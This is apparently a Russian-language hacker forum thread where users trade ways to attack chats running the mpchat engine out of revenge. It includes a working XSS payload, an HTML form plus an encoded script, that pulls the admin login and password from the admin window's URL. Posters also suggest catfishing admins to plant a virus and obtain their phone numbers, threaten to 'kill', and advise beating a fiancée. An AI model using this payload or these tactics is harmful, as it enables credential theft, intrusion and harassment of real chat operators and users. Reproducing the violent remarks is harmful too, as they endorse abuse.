Попробуй в сообщении кинуть картинку-пиздельщик :d

Всмысле не в сообщении(а там есть такая штука как "Почта")

Чат ломается на уровне хтмла... до базы мне долезть не удалось, но вживление скрипта катит. Даже при наличии yourkey модера я не смог залезть в админку... сервак проверяет сессию на такие вещи. Но реально поиметь внутреннюю почту. Уязвимость в движке у всех чатов mpchat, маленькая, но позволяет делать с ним и с юзерами многое. Я сам с сегодня обижен на один такой чат ибо забанили всех клонов и повесили подтверждение на регистрацию влезу... убью

Вот и помоги West-у, но тока в открытую не выкладывай. А то завтра ее, баги, уже не будет, а таких как West - будут. И будут также просить. Ну где их еще то взять, если баги постоянно закрывают?

__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•

To West.. в личку пиши, ща в нём сижу... У них в порядке вещей закидывать окнами ? Пиши короче

А что вообше твоя невеста в чате делает ? лень просто стобой день провести ? или она уже к тебе равнодушна ? вообшим это твои проблемы, но я бы на твоём месте , не Админа морду набил, а твоей невести, вот тогда посмотрим он зайдёт в чаты или нет.

код для теста xss
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><form action="http://mpchat.com/_admin.php" target="_blank">
<textarea cols="50" rows="5" name="chat" id="chat">z style=`background:url(javascript:alert())`</textarea><br>
<input type="submit">
</form>[/QUOTE]<span id='postcolor'>

птом открыть админку и открыть чтарницу с этим кодом, птом заменить в поле alert() на
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">document.write(unescape(/%3Cimg%20src=%22javascript:z=window.open(%27%27,%2 7administration%27)%3Balert(z.document.location)%3 B%22%3E/))[/QUOTE]<span id='postcolor'>

и послать форму и откроется страница с xss иньекцией которая обратится в окно с именем administration и даст url с логином и пассвордом.

Что бы обезопасить свой чат нужно метод get сменить на post, тогда в админке url не будет состоять из логина и пассворда.

¤ ¤ ¤Эльф¤ ¤ ¤
можно поподробней?

И еще метод - я не думаю, что там уже оч прошареные админы. Зарегься под какой-нибудь шикарной бабой (пускай твой диалог займет больше времени), всунь фотку модели какой, и
1. Всунь вирус поновее, чтобы они не просекли.
2. Узнай номер телефона.
Тогда и поговоришь по душам с теми людьми, коль уж они тебе так насолили